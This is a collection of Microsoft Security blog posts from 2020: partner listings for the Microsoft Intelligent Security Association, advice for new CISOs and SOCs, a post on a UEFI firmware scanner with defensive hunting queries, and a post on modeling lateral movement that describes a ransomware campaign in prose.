As a leading cybersecurity consulting company, Truesec offers a wide range of services including security health checks, security engineering, and penetration testing, all provided by cyber security specialists. Our managed service will give your organization the capability to detect and respond quickly to cyberattacks. Our success is based on a combination of extraordinary cyber experts, the most advanced tools in the market today, and by investing in truly understanding the specifics of our client’s IT environments. Learn more.

Trustwave

MISA service offering:  Microsoft Defender ATP, Azure Sentinel

Trustwave Threat Detection and Response Services for Microsoft Azure uses Microsoft Security Graph API to ingest data from Microsoft Azure Sentinel and Microsoft Defender ATP to provide real-time triage, analysis, investigation, response, and remediation of security threats. Learn more.

Wipro

MISA service offering: Azure Active Directory, Azure Sentinel

Wipro provides end-to-end security solutions and services for business to enterprise, partners and consumers through Microsoft security stacks. Learn more

For more information

To learn more about the Microsoft Intelligent Security Association watch this video or visit the webpage.  To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Intelligent Security Association expands to include managed security service providers appeared first on Microsoft Security.

Microsoft Intelligent Security Association expands to include managed security service providers

July 14th, 2020 No comments

We’d planned a splashy party at Microsoft Inspire to announce our newest Microsoft Intelligent Security Association (MISA) members and introduce them to association members, but given our world today, I am instead picturing you reading this announcement curled up in a chair with a cup of coffee. Almost as satisfying, right?

Welcoming Managed Security Service Providers to MISA

Two years ago, we launched MISA to offer our customers holistic solutions that help them better defend against a world of increasing threats. Our vision was to build a robust security ecosystem that included leading security technology companies that provide value to our joint customers. We began by partnering with independent software vendors that have integrated their solutions with Microsoft. Since launch, MISA has expanded significantly—in just the last year, membership increased from 57 members to 133!

Through MISA, we’ve been able to collaborate with some of the most innovative security companies in the world, but our joint customers also need security services that are deeply interwoven with MISA software solutions. To meet this demand, MISA is launching an invitation-only pilot program in July 2020 for select managed security service providers (MSSPs).

Today we’re happy to bring a win-win-win offering by enabling MSSPs and managed detection and response partners to sell and deploy not just Microsoft’s security solutions but more importantly our joint solutions with our independent software vendor partners.”  – Eran Barak, Principle PM Manager, Microsoft Threat Protection.

By including MSSPs in the program, our joint customers will benefit from security consultants with deep expertise in MISA solutions, enabling them to get the most out of their investments. The expansion also creates more opportunities for security organizations to work together on the creative solutions we will need to confront an evolving threat landscape.

“MISA members are the cybersecurity industry leaders, unified by the common goal of helping secure our customers by offering their own valuable expertise and making the association more effective as it expands.”– Mandana Javaheri, Global Director of Cybersecurity Solutions Group at Microsoft Corp.

I am proud of the work that MISA has accomplished to date and look forward to partnering with our newest members to help our joint customers better safeguard their organizations. Please join me in welcoming the following MSSPs to MISA:

Accenture

MISA service offering: Azure Sentinel

Accenture Security helps organizations prepare, protect, detect, respond and recover along across the entire Microsoft Security portfolio across the full security lifecycle. Learn more.

AscentSolutions

MISA service offering: Azure Sentinel, Azure Security Center

Ascent Solutions’ risk-based defense strategy aligns your priorities with the right technology, processes, and route map to make your business more secure today. And because cybersecurity is at the heart of everything we do, we also help you defend against the right attack vectors and combat malicious actors to better protect your businesses into the future. Learn more.

Avanade

MISA service offering: Azure Sentinel

From enabling a modern workplace, to protecting your applications in the cloud, Avanade provides a holistic approach to security at every step. Learn more. 

BlueVoyant

MISA service offering: Azure Sentinel, Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP)

BlueVoyant provides managed detection and response (MDR) services utilizing Azure Sentinel, a cloud-native security information and event manager (SIEM), and Microsoft Threat Protection, an integrated platform that unifies best-in-class products that include Microsoft Defender ATP, Office 365 Advanced Threat Protection, Azure Advanced Threat Protection, and Microsoft Cloud Application Security. Learn more.

Born in the Cloud

MISA service offering: Azure Sentinel, Azure Security Center

Born In The Cloud leverages Azure Security services including Azure Sentinel and machine learning algorithms to monitor your environment and make sense of the data faster than any human can, allowing us to respond to threats quickly. We also manage Windows 10, Office 365, Microsoft Defender ATP and Microsoft Endpoint Manager for you, to help keep devices, data, and identities safe. All built on Azure Cloud. Learn more.

BT

MISA service offering: Azure Sentinel

One of the few local service providers in managed security services, BT Consulting uses cutting edge technology to monitor firewalls and manage endpoint security. Learn more.

Critical Start

MISA service offering: Microsoft Defender ATP, Azure Sentinel

CRITICALSTART enables customers to centralize, ingest, and correlate their logs to ensure their environment is secure. CRITICALSTART’s MDR utilizes a Trusted Behavior Registry to investigate every alert generated until they are classified as a known good and can be safely resolved. Customers see every action our CYBERSOC analysts take since our platform provides transparency across the entire process. Learn more.

Cyberproof

MISA service offering: Azure Sentinel

Cyberproof monitors your security alerts and suspicious events, collected from multiple internal and external customer data sources including Microsoft Azure Sentinel SIEM. Threats are detected as they emerge in critical cloud and on-premises infrastructure. Learn more.

Dell

MISA service offering: Microsoft Defender ATP, Azure ATP

At Dell, security is a priority – a part of every conversation; it connects our team members, customers, processes and technologies. Dell’s Security and Trust Center provides easy access to resources and solutions to help you quickly find answers to your security questions. Learn more.

Expel

MISA service offering: Microsoft Defender ATP, Azure Sentinel

The combination of the Expel Workbench™ and Expel analysts monitor your environment 24×7 to provide transparent managed security that finds attackers and gives you the answers to help you kick them out and keep them out. Learn more.

EY

MISA service offering: Microsoft Defender ATP, Azure Security Center

EY provides day-to-day resilience as well as a proactive, pragmatic, and strategic approach that considers risk and security from the onset. This is Security by Design. Rather than avoiding risk altogether, Security by Design is about enabling trust in systems, designs, and data so that organizations can take on more risk, lead transformational change, and innovate with confidence. EY Next-generation security operations and response teams can provide organizations with the right amount of support to help them manage leading-class security operations in a programmatic way.  Learn more.

FishTech

MISA service offering: Microsoft Defender ATP

Fishtech is the leading current generation cybersecurity services provider for enabling secure and successful business transformation. Data-driven and born in the cloud, Fishtech provides the people, processes, and technology to minimize risk, maintain compliance, and increase business efficiency. Our human-led, machine-driven security-as-a-service division, CYDERES, helps organizations manage cybersecurity risks, detect threats, and respond to security incidents in real-time. Learn more.

Infosys

MISA service offering: Azure Active Directory, Azure Sentinel

Infosys CyberSecurity offers a flexible managed security services model that empowers organizations with people, processes, and technology to secure their critical assets and data. With our quality services, we help protect your data and infrastructure with the latest technology and certified professionals, while adhering to the latest industry-specific compliance standards. Learn more.

Insight

MISA service offering: Azure Sentinel

Insight Services for Azure Sentinel help you take advantage of cutting-edge technology from Microsoft to strengthen and simplify your security environment. During an engagement, our consultants address all major areas of your SOC, including new tools or processes that would be beneficial to adopt. Learn more.

Inspark

MISA service offering: Azure Sentinel

The new Azure Sentinel and the Fusion capabilities empower Inspark to help keep our customers safe for the future. Our Cloud Security Center incorporates Azure Sentinel and the Microsoft Security Graph into our solution to better protect our customers. Learn more.

KPMG (US & EMEA)

MISA service offering: Azure Sentinel

The KPMG + Azure Sentinel solution has been designed to help businesses improve their security monitoring and incident response capabilities by combining KPMG’s cybersecurity, incident response, and industry experience with Microsoft’s advanced cybersecurity technologies. Learn more.

Open Systems

MISA service offering: Azure Sentinel

Open Systems designed a scalable MDR platform that helps detect threats early to limit the damage. It combines human knowhow, advanced automated threat detection, and the best sensor technology. In addition, a cloud-scale SIEM built on Microsoft Azure Sentinel ensures smooth logfile integration from your existing security controls and other sources of relevant data. Learn more.

Optiv Security

MISA service offering: Microsoft Defender ATP, Azure Sentinel, Azure Active Directory

Optiv Security is a security solutions integrator that enables clients to reduce risk by taking a strategic approach to cybersecurity. Align your security program to achieve specific business outcomes with our full suite of service capabilities, from strategy to technology—and everything in between. Our managed security services provide vetted on-staff vulnerability and security researchers and multiple operations centers to support your organization every moment, of every day, so you can refocus your existing IT staff on core business needs. Learn more.

Truesec

MISA service offering: Microsoft Defender ATP

As a leading cybersecurity consulting company, Truesec offers a wide range of services including security health checks, security engineering, and penetration testing, all provided by cyber security specialists. Our managed service will give your organization the capability to detect and respond quickly to cyberattacks. Our success is based on a combination of extraordinary cyber experts, the most advanced tools in the market today, and by investing in truly understanding the specifics of our client’s IT environments. Learn more.

Trustwave

MISA service offering:  Microsoft Defender ATP, Azure Sentinel

Trustwave Threat Detection and Response Services for Microsoft Azure uses Microsoft Security Graph API to ingest data from Microsoft Azure Sentinel and Microsoft Defender ATP to provide real-time triage, analysis, investigation, response, and remediation of security threats. Learn more.

Wipro

MISA service offering: Azure Active Directory, Azure Sentinel

Wipro provides end-to-end security solutions and services for business to enterprise, partners and consumers through Microsoft security stacks. Learn more

For more information

To learn more about the Microsoft Intelligent Security Association watch this video or visit the webpage.  To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Intelligent Security Association expands to include managed security service providers appeared first on Microsoft Security.

CISO Stressbusters: Post #2: 4 tips for getting the first 6 months right as a new CISO

June 23rd, 2020 No comments

In your first six months in a new Chief Information Security Officer (CISO) role, you will often be tasked with building a security program. For some of us this is the most exciting part of the job, but it can also be stressful. You’re probably working under a deadline. Plus, it can be difficult to affect change while you’re learning the corporate culture.

In my role as CISO at Mainstay Technologies, I run a team that is responsible for security for each of our clients. I’ve learned a lot about what it takes to create a security program that’s sustainable in different organization types, sizes and industries. In this post, the second in the CISO Stressbusters series, I’ve distilled my learnings into four tips that you can apply to your own organization.

1. What makes your organization tick?

An effective security program requires participation from people across the organization. If you understand what drives decision-making and behavior, it will help you develop a scalable and sustainable plan that will be implemented and accepted into your culture. Talk with and interview team members at all levels of the organization and across departments to understand the shared values that drive the company. Identify how the organization collaborates, how decisions are made, and what your company’s risk tolerance is.

2. Do you know where all your data is? Are you sure?

Before you can implement a new program, you need to understand your current state and the gap that exists between where you are today and standards that must be met. You may need to lower real-world risk, satisfy compliance demands, or likely, both.

Start by identifying data privacy laws that you must comply with (i.e., California Privacy Protect Act or Massachusetts 201 CMR 17) and compliance frameworks that you may be contractually obligated to adhere to (i.e., DFARS NIST 800-171 or CMMC) or select a standard you will align yourself to (i.e., the NIST Cybersecurity Framework). The data that you are trying to protect must be at the core of a discovery effort. Are you protecting classified information, controlled unclassified information, patient health information, personally identifiable information, etc.? Classify it, then identify how it flows and where it lives. Then build defensive layers to protect it.

A risk assessment should be completed that includes your compliance gap analysis as well as a detailed analysis of internal and external threats and vulnerabilities (technical and organizational). This will also help to generate your risk profile: Risk equals probability multiplied by impact.

It’s also helpful to gather tangible evidence when conducting your assessment. Vulnerability, account control, and role-based access reports should all be standard. During your interviews you may hear about very organized data flows. Run a data discovery scan to see what type of data is actually being stored in which locations. Do you know how well trained your staff is? Think about integrating a red team exercise or include physical security tests. Or consider starting with something basic like phishing tests.

When Mainstay engages with a new client, we interview stakeholders to understand how they manage and protect data, and then we verify. When the assessment is complete, we move into mitigation and remediation strategies. This includes developing plans to close technical, administrative, and physical gaps. If you don’t have written information security policies and a system security plan, this should be evident in your assessment and will be part of your remediation strategy. If you don’t know who is in your building or connected to your network, physical controls, and network access controls should be implemented. We often find that data controls aren’t nearly as strong as people think, so when it comes to assessment the best approach is trust but verify.

Microsoft Defender Advanced Threat Protection (ATP) is a great technical example of software that can help you identify and manage threats and vulnerabilities in your environment.

3. Mind the gap

A thorough risk assessment gives you the data you need to start building your information security program. From there, highlight your gaps and build a remediation roadmap with milestones.  Your security posture should increase each step of the way. Work towards a continuous monitoring strategy. Define where you would like your security program to be in six months vs. two years, align with your stakeholders, and build momentum. Prioritize quick wins that you can close out now to help reduce risk immediately.

4. Map everything to the “Why”

Upfront legwork to understand the corporate culture will pay off when it’s time to establish new security policies and training. You will need to embed operational change throughout the organization. To do so requires company buy-in and participation.

Educate executives and business leaders on risk management. Show them how the changes you are recommending will improve ROI. Develop a cross-discipline governance team that reports on cybersecurity risk management at the leadership level. Conduct regular training and check ins to make sure processes are being followed. By distributing the responsibility, you will alleviate the pressure on you and your team, and it will help you build a security culture. A win-win!

Looking ahead

The job of a CISO is stressful. Don’t do it alone. Ally with people in your organization who share your values and can help you achieve your goals. Connect with CISOs from other companies who can commiserate and share advice. And stay tuned for the next CISO Stressbuster post for more advice from other CISOs and security professionals in the trenches.

Did you find these insights helpful? What would you tell your fellow CISOs about overcoming obstacles? What works for you? Please reach out to Diana Kelley on LinkedIn if you’re interested in being interviewed for one of our upcoming posts on CISO insights and stressbusters.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post CISO Stressbusters: Post #2: 4 tips for getting the first 6 months right as a new CISO appeared first on Microsoft Security.

Modernizing the security operations center to better secure a remote workforce

June 22nd, 2020 No comments

The response to COVID-19 has required many security operations centers (SOCs) to rethink how they protect their organizations. With so many employees working remotely, IT groups are routing more traffic directly to cloud apps, rather than through the network. In this model, traditional network security controls aren’t enough. Endpoint signals and identity-based security matter more than ever.

Even under the best circumstances, managing and working in an SOC is stressful—and these aren’t normal times! We know you’re under a lot of pressure, with less visibility and concerns over balancing user productivity without compromising security. But we also know many of the changes companies have made to support remote work during this crisis will remain in place once the virus is gone—some have already announced more flexible and permanent remote work policies. In light of this new reality, the SOC will also need to adjust. In this blog, we’ve outlined some principles of the modern SOC which can guide that transition. You can also hear us discuss these concepts by viewing a replay of the 2020 Microsoft Virtual Security and Compliance Summit.

It’s a multi-cloud world

Odds are good your organization doesn’t use just one cloud. You may manage much of your infrastructure on Microsoft Azure, but you also probably use Amazon Web Services (AWS) or Google Cloud Platform (GCP) too. And when we say cloud, we don’t just mean infrastructure as a service (IaaS). We also mean development work on a platform as a service (PaaS) and software-as-a-service (SaaS) apps hosted in a cloud—although it’s not always clear which cloud it’s hosted on. Without visibility across all platforms where business information is stored and transacted, you don’t have a full view of your corporate security program and risk profile.

Although the major cloud service providers offer tools that let you monitor their environment extensively, you need a holistic view to correlate threats and assess how one threat may impact another resource. Solutions like Microsoft Cloud App Security give you tools to detect cloud apps and monitor and protect them, while Azure Sentinel collects and analyzes data across on-premises and in multiple clouds.

Visibility into all connected devices

As more employees use cloud apps and mobile devices for work, the traditional network security perimeter has lost relevance. This puts greater emphasis on endpoint monitoring and protection. But it goes beyond employee devices. There has been an explosion of the internet of things (IoT) across industries. The industrial internet of things (IIoT) and industrial control systems (ICS) provide yet another opportunity for bad actors to infiltrate your environment. Security platforms like Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can help you prevent, detect, investigate, and respond to threats across all your endpoints. And Microsoft Defender ATP integrates with Microsoft Threat Protection to give you visibility across devices, identity, cloud apps, data, and infrastructure.

Humans and machine learning working together

Part of what makes this job so challenging is the sheer number of endpoints and environments that need to be monitored. Each of those entities produces thousands of alerts—not all of which are legitimate threats. If you are using several security tools that aren’t well integrated, correlating signals across your entire environment is tough. To find the real threats, you may spend hours combing through false positives. Alert fatigue is inevitable, making it easy to miss true issues.

In the modern SOC, artificial intelligence (AI) and machine learning (ML) will be deployed to help people focus on the right problems. If you’re worried that AI and ML will automate you out of a job, “help people” was the most important part of the previous sentence. We believe people are (and will continue to be) a necessary part of cyber defense work. AI and ML are simply not equipped to do the complex problem solving that people do. What AI and ML can do is reduce the noise, so that people can focus on responding to more complex threats and trying to uncover what the humans behind attacks are planning next.

In solutions like Azure Sentinel, AI and ML reason over massive amounts of data to better detect behavior that indicates compromise. Using probabilistic models, such as Markov Chain Monte Carlo simulations, Azure Sentinel takes low fidelity alerts and combines them into fewer actionable high-fidelity alerts, increasing the true positive rate to reduce analyst alert fatigue.

Gamification of security training

The core mission of the SOC is to identify compromise rapidly and respond to incidents. In the middle of an attack, minutes matter, so it’s critical that you respond quickly and intelligently. But these are also the moments when adrenaline runs high, and people panic. You may not make the best decisions in a state of high alert. To provide structure during an incident, it helps to have a plan.

A playbook includes a set of processes and steps for various triggers. Written playbooks provide you a reference in the heat of the moment. You can also automate playbooks using the security orchestration, automation, and response (SOAR) capabilities in solutions like Azure Sentinel.

Practicing your plan can help build muscle memory. In tabletop exercises, teams talk though how they would respond to specific scenarios in a low stress environment. When an actual attack occurs, they draw on these exercises to inform decision making.

To better engage participants, many SOCs are gamifying their training sessions. Capture the flag contests divide groups into a red team (the attackers) and a blue team (the defenders) and challenges them to defend (or capture) a computer system. Microsoft’s OneHunt brings together security professionals across the Microsoft organization to conduct a weeklong red team vs. blue team simulation. At the Ignite World Tour, Into the Breach was one of the most popular events. In this game, participants defended a system from an AI-generated attack using Azure Sentinel and Microsoft Threat Protection solutions. Activities like these let teams practice in a fast-moving situation that replicates the experience of a real attack, without the high stakes.

Learn more

It’s been a tough few months for technology teams supporting a rapid migration to remote work. As you begin to modernize your SOC for our new reality, the following resources may help:

For more information about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to Diana on LinkedIn or Twitter.

The post Modernizing the security operations center to better secure a remote workforce appeared first on Microsoft Security.

UEFI scanner brings Microsoft Defender ATP protection to a new level

June 17th, 2020 No comments

Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) is extending its protection capabilities to the firmware level with a new Unified Extensible Firmware Interface (UEFI) scanner.

Hardware and firmware-level attacks have continued to rise in recent years, as modern security solutions made persistence and detection evasion on the operating system more difficult. Attackers compromise the boot flow to achieve low-level malware behavior that’s hard to detect, posing a significant risk to an organization’s security posture.

Windows Defender System Guard helps defend against firmware attacks by providing guarantees for secure boot through hardware-backed security features like hypervisor-level attestation and Secure Launch, also known as Dynamic Root of Trust (DRTM), which are enabled by default in Secured-core PCs. The new UEFI scan engine in Microsoft Defender ATP expands on these protections by making firmware scanning broadly available.

The UEFI scanner is a new component of the built-in antivirus solution on Windows 10 and gives Microsoft Defender ATP the unique ability to scan inside of the firmware filesystem and perform security assessment. It integrates insights from our partner chipset manufacturers and further expands the comprehensive endpoint protection provided by Microsoft Defender ATP.

How the UEFI scanner in Microsoft Defender ATP works

The new UEFI scanner reads the firmware file system at runtime by interacting with the motherboard chipset. To detect threats, it performs dynamic analysis using multiple new solution components that include:

  • UEFI anti-rootkit, which reaches the firmware through Serial Peripheral Interface (SPI)
  • Full filesystem scanner, which analyzes content inside the firmware
  • Detection engine, which identifies exploits and malicious behaviors

Firmware scanning is orchestrated by runtime events like suspicious driver load and through periodic system scans. Detections are reported in Windows Security, under Protection history.

Screenshot of Windows Security notification showing detection of malicious content in non-volatile memory (NVRAM)

Figure 1. Windows Security notification showing detection of malicious content in non-volatile memory (NVRAM)

Microsoft Defender ATP customers will also see these detections raised as alerts in Microsoft Defender Security Center, empowering security operations teams to investigate and respond to firmware attacks and suspicious activities at the firmware level in their environments.

Screenshot of Microsoft Defender ATP alert for detection of malicious code in firmware

Figure 2. Microsoft Defender ATP alert for detection of malicious code in firmware

Security operations teams can also use the advanced hunting capabilities in Microsoft Defender ATP to hunt for these threats:

DeviceEvents
| where ActionType == "AntivirusDetection"
| extend ParsedFields=parse_json(AdditionalFields)
| extend ThreatName=tostring(ParsedFields.ThreatName)
| where ThreatName contains_cs "UEFI"
| project ThreatName=tostring(ParsedFields.ThreatName),
 FileName, SHA1, DeviceName, Timestamp
| limit 100

To detect unknown threats in SPI flash, signals from the UEFI scanner are analyzed to identify anomalies and where they have been executed. Anomalies are reported to the Microsoft Defender Security Center for investigation.

Screenshot of Microsoft Defender ATP alert for possible malware implant in UEFI file system

Figure 3. Microsoft Defender ATP alert for possible malware implant in UEFI file system

These events can likewise be queried through advanced hunting:

DeviceAlertEvents
| where Title has "UEFI"
| summarize Titles=makeset(Title) by DeviceName, DeviceId, bin(Timestamp, 1d)
| limit 100

How we built the UEFI scanner

The Unified Extensible Firmware Interface (UEFI) is a replacement for legacy BIOS. If the chipset is configured correctly (UEFI & chipset configuration itself) and secure boot is enabled, the firmware is reasonably secure. To perform a hardware-based attack, attackers exploit a vulnerable firmware or a misconfigured machine to deploy a rootkit, which allows attackers to gain foothold on the machine.

Figure 4. Expected boot flow vs. compromised boot flow

As figure 4 shows, for devices that are configured correctly, the boot path from power-on to OS initialization is reliable. If secure boot is disabled or if the motherboard chipset is misconfigured, attackers can change the contents of UEFI drivers that are unsigned or tampered with in the firmware. This could allow attackers to take over control of devices and give them the capability to deprivilege the operating system kernel or antivirus to reconfigure the security of the firmware.

Diagram of UEFI platform initalization

Figure 5. UEFI platform initialization

The Serial Peripheral Interface (SPI) flash stores important information. Its structure depends on OEMs design, and commonly includes processor microcode update, Intel Management Engine (ME), and boot image, a UEFI executable. When a computer runs, processors execute the firmware code from SPI flash for a while during UEFI’s SEC phase. Instead of memory, the flash is permanently mapped to x86 reset vector (physical address 0xFFFF_FFF0). However, attackers can interfere with memory access to reset vector by software. They do this by reprogramming the BIOS control register on misconfigured devices, making it even harder for security software to determine exactly what gets executed during boot.

Once an implant is deployed, it’s hard to detect. To catch threats at this level, security solutions at the OS level relies on information from the firmware, but the chain of trust is weakened.

Technically, the firmware is not stored and is not accessible from main memory. As opposed to other software, it’s stored in SPI flash storage, so the new UEFI scanner must follow the hardware protocol provided by hardware manufacturers. To be compatible and be up to date with all platforms, it needs to take into consideration protocol differences.

Diagram of UEFI scanner internals

Figure 6. UEFI scanner internals overview

The UEFI scanner performs dynamic analysis on the firmware it gets from the hardware flash storage. By obtaining the firmware, the scanner is able to parse the firmware, enabling Microsoft Defender ATP to inspect firmware content at runtime.

Comprehensive security levels up with low-level protections

The new UEFI scanner adds to a rich set of Microsoft technologies that integrate to deliver chip-to-cloud security, from a strong hardware root of trust to cloud-powered security solutions at the OS level.

Hardware backed security features like Secure Launch and device attestation help stop firmware attacks. These features, which are enabled by default in Secured-core PCs, seamlessly integrate with Microsoft Defender ATP to provide comprehensive endpoint protection.

With its UEFI scanner, Microsoft Defender ATP gets even richer visibility into threats at the firmware level, where attackers have been increasingly focusing their efforts on. Security operations teams can use this new level of visibility, along with the rich set of detection and response capabilities in Microsoft Defender ATP, to investigate and contain such advanced attacks.

This level of visibility is also available in Microsoft Threat Protection (MTP), which delivers an even broader cross-domain defense that coordinates protection across endpoints, identities, email, and apps.

 

 

Kelvin Chan, Shweta Jha, Gowtham Reddy A

Microsoft Defender ATP team

 

 

The post UEFI scanner brings Microsoft Defender ATP protection to a new level appeared first on Microsoft Security.

The science behind Microsoft Threat Protection: Attack modeling for finding and stopping evasive ransomware

June 10th, 2020 No comments

The linchpin of successful cyberattacks, exemplified by nation state-level attacks and human-operated ransomware, is their ability to find the path of least resistance and progressively move across a compromised network. Determining the full scope and impact of these attacks is one the most critical, but often most challenging, parts of security operations.

To provide security teams with the visibility and solutions to fight cyberattacks, Microsoft Threat Protection (MTP) correlates threat signals across multiple domains and point solutions, including endpoints, identities, data, and applications. This comprehensive visibility allows MTP to coordinate prevention, detection, and response across your Microsoft 365 data.

One of the many ways that MTP delivers on this promise is by providing high-quality consolidation of attack evidence through the concept of incidents. Incidents combine related alerts and attack behaviors within an enterprise. An example of an incident is the consolidation of all behaviors indicating ransomware is present on multiple machines, and connecting lateral movement behavior with initial access via brute force. Another example can be found in the latest MITRE ATT&CK evaluation, where Microsoft Threat Protection automatically correlated 80 distinct alerts into two incidents that mirrored the two attack simulations.

The incident view helps empower defenders to quickly understand and respond to the end-to-end scope of real-world attacks. In this blog we will share details about a data-driven approach for identifying and augmenting incidents with behavioral evidence of lateral movement detected through statistical modeling. This novel approach, an intersection of data science and security expertise, is validated and leveraged by our own Microsoft Threat Experts in identifying and understanding the scope of attacks.

Identifying lateral movement

Attackers move laterally to escalate privileges or to steal information from specific machines in a compromised network. Lateral movement typically involves adversaries attempting to co-opt legitimate management and business operation capabilities, including applications such as Server Message Block (SMB), Windows Management Instrumentation (WMI), Windows Remote Management (WinRM), and Remote Desktop Protocol (RDP). Attackers target these technologies that have legitimate uses in maintaining functionality of a network because they provide ample opportunities to blend in with large volumes of expected telemetry and provide paths to their objectives. More recently, we have observed attackers performing lateral movement, and then using the aforementioned WMI or SMB to deploy ransomware or data-wiping malware to multiple target machines in the network.

A recent attack from the PARINACOTA group, known for human-operated attacks that deploy the Wadhrama ransomware, is notable for its use of multiple methods for lateral movement. After gaining initial access to an internet-facing server via RDP brute force, the attackers searched for additional vulnerable machines in the network by scanning on ports 3389 (RDP), 445 (SMB), and 22 (SSH).

The adversaries downloaded and used Hydra to brute force targets via SMB and SSH. In addition, they used credentials that they stole through credential dumping using Mimikatz to sign into multiple other server machines via Remote Desktop. On all additional machines they were able to access, the attackers performed mainly the same activities, dumping credentials and searching for valuable information.

Notably, the attackers were particularly interested in a server that did not have Remote Desktop enabled. They used WMI in conjunction with PsExec to allow remote desktop connections on the server and then used netsh to disable blocking on port 3389 in the firewall. This allowed the attackers to connect to the server via RDP.

They eventually used this server to deploy ransomware to a huge portion of the organization’s server machine infrastructure. The attack, an example of a human-operated ransomware campaign, crippled much of the organization’s functionality, demonstrating that detecting and mitigating lateral movement is critical.

PARINACOTA ransomware attack chain

Figure 1. PARINACOTA attack with multiple lateral movement methods

A probabilistic approach for inferring lateral movement

Automatically correlating alerts and evidence of lateral movement into distinct incidents requires understanding the full scope of an attack and establishing the links of an attacker’s activities that show movement across a network. Distinguishing malicious attacker activities among the noise of legitimate logons in complex networks can be challenging and time-consuming. Failing to get an aggregated view of all related alerts, assets, investigations, and evidence may limit the action that defenders take to mitigate and fully resolve an attack.

Microsoft Threat Protection uses its unique cross-domain visibility and built-in automation powered to detect lateral movement The data-driven approach to detecting lateral movement involves understanding and statistically quantifying behaviors that are observed to a part of one attack chain, for example, credential theft followed by remote connections to other devices and further unexpected or malicious activity.

Dynamic probability models, which are capable of self-learning over time using new information, quantify the likelihood of observing lateral movement given relevant signals. These signals can include the frequency of network connections between endpoints over certain ports, suspicious dropped files, and types of processes that are executed on endpoints. Multiple behavioral models encode different facets of an attack chain by correlating specific behaviors associated with attacks. These models, in combination with anomaly detection, drive the discovery of both known and unknown attacks.

Evidence of lateral movement can be modeled using a graph-based approach, which involves constructing appropriate nodes and edges in the right timeline. Figure 2 depicts a graphical representation of how an attacker might laterally move through a network. The objective of graphing an attack is to discover related subgraphs with high enough confidence to surface for immediate further investigation. Building behavioral models that can accurately compute probabilities of attacks is key to ensuring that confidence is correctly measured and all related events are combined.

Visualization of network with an attacker moving laterally

Figure 2. Visualization of network with an attacker moving laterally (combining incidents 1, 2, 4, 5)

Figure 3 outlines the steps involved for modeling lateral movement and encoding behaviors that are later referenced for augmenting incidents. Through advanced hunting, examples of lateral movement are surfaced, and real attack behaviors are analyzed. Signals are then formed by aggregating telemetry, and behavioral models are defined and computed.

Diagram showing steps for specifying statistical models for detecting lateral movement

Figure 3. Specifying statistical models to detect lateral movement encoding behaviors

Behavioral models are carefully designed by statisticians and threat experts working together to combine best practices from probabilistic reasoning and security, and to precisely reflect the attacker landscape.

With behavioral models specified, the process for incident augmentation proceeds by applying fuzzy mapping to respective behaviors, followed by estimating the likelihood of an attack. For example, if there’s sufficient confidence that the relative likelihood of an attack is higher, including the lateral movement behaviors, then the events are linked. Figure 4 shows the flow of this logic. We have demonstrated that the combination of this modeling with a feedback loop based on expert knowledge and real-world examples accurately discovers attack chains.

Diagram showing steps of algorithm for augmenting incidents using graph inference

Figure 4. Flow of incident augmentation algorithm based on graph inference

Chaining together the flow of this logic in a graph exposes attacks as they traverse a network. Figure 5 shows, for instance, how alerts can be leveraged as nodes and DCOM traffic (TCP port 135) as edges to identify lateral movement across machines. The alerts on these machines can then be fused together into a single incident. Visualizing these edges and nodes in a graph shows how a single compromised machine could allow an attacker to move laterally to three machines, one of which was then used for even further lateral movement.

Diagram showing relevant alerts as an attack move laterally from one machine to other machines

Figure 5. Correlating attacks as they pivot through machines

Augmenting incidents with lateral movement intel

The PARINACOTA attack we described earlier is a human-operated ransomware campaign that involved compromising six newly onboarded servers. Microsoft Threat Protection automatically correlated the following events into an incident that showed the end-to-end attack chain:

  • A behavioral model identified RDP inbound brute force attempts that started a few days before the ransomware was deployed, as depicted in Figure 6.
  • When the initial compromise was detected, the brute force attempts were automatically identified as the cause of the breach.
  • Following the breach, attackers dropped multiple suspicious files on the compromised server and proceeded to move laterally to multiple other servers and deploy the ransomware payload. This attack chain raised 16 distinct alerts that Microsoft Threat Protection, applying the probabilistic reasoning method, correlated into the same incident indicating the spread of ransomware, as illustrated in Figure 7.

Graph showing increased daily inbound RDP traffic

Figure 6. Indicator of brute force attack based on time series count of daily inbound public IP

Diagram showing ransomware being deployed after an attacker has moved laterally

Figure 7. Representation of post breach and ransomware spreading from initial compromised server

Another area where constructing graphs is particularly useful is when attacks originate from unknown devices. These unknown devices can be misconfigured machines, rogue devices, or even IoT devices within a network. Even when there’s no robust telemetry from devices, they can still be used as linking points for correlating activity across multiple monitored devices.

In one example, as demonstrated in figure 8, we saw lateral movement from an unmonitored device via SMB to a monitored device. That device then established a connection back to a command-and-control (C2), set up persistence, and collected a variety of information from the device. Later, the same unmonitored device established an SMB connection to a second monitored device. This time, the only actions the attacker took was to collect information from the device.

The two devices shared a common set of events that were correlated into the same incident:

  • Sign-in from an unknown device via SMB
  • Collecting device information

Diagram showing suspicious traffic from unknown devices

Figure 8: Correlating attacks from unknown devices

Conclusion

Lateral movement is one of the most challenging areas of attack detection because it can be a very subtle signal amidst the normal hum of a large environment. In this blog we described a data-driven approach for identifying lateral movement in enterprise networks, with the goal of driving incident-level discovery of attacks, delivering on the Microsoft Threat Protection (MTP) promise to provide coordinated defense against attacks. This approach works by:

  • Consolidating signals from Microsoft Threat Protection’s unparalleled visibility into endpoints, identities, data, and applications.
  • Forming automated, compound questions of the data to identify evidence of an attack across the data ecosystem.
  • Building subgraphs of lateral movement across devices by modeling attack behavior probabilistically.

This approach combines industry-leading optics, expertise, and data science, resulting in automated discovery of some of the most critical threats in customer environments today. Through Microsoft Threat Protection, organizations can uncover lateral movement in their networks and gain understanding of end-to-end attack chains. Microsoft Threat Protection empowers defenders to automatically stop and resolve attacks, so security operations teams can focus their precious time and resources to more critical tasks, including performing mitigation actions that can remove the ability of attackers to move laterally in the first place, as outlined in some of our recent investigations here and here.

 

 

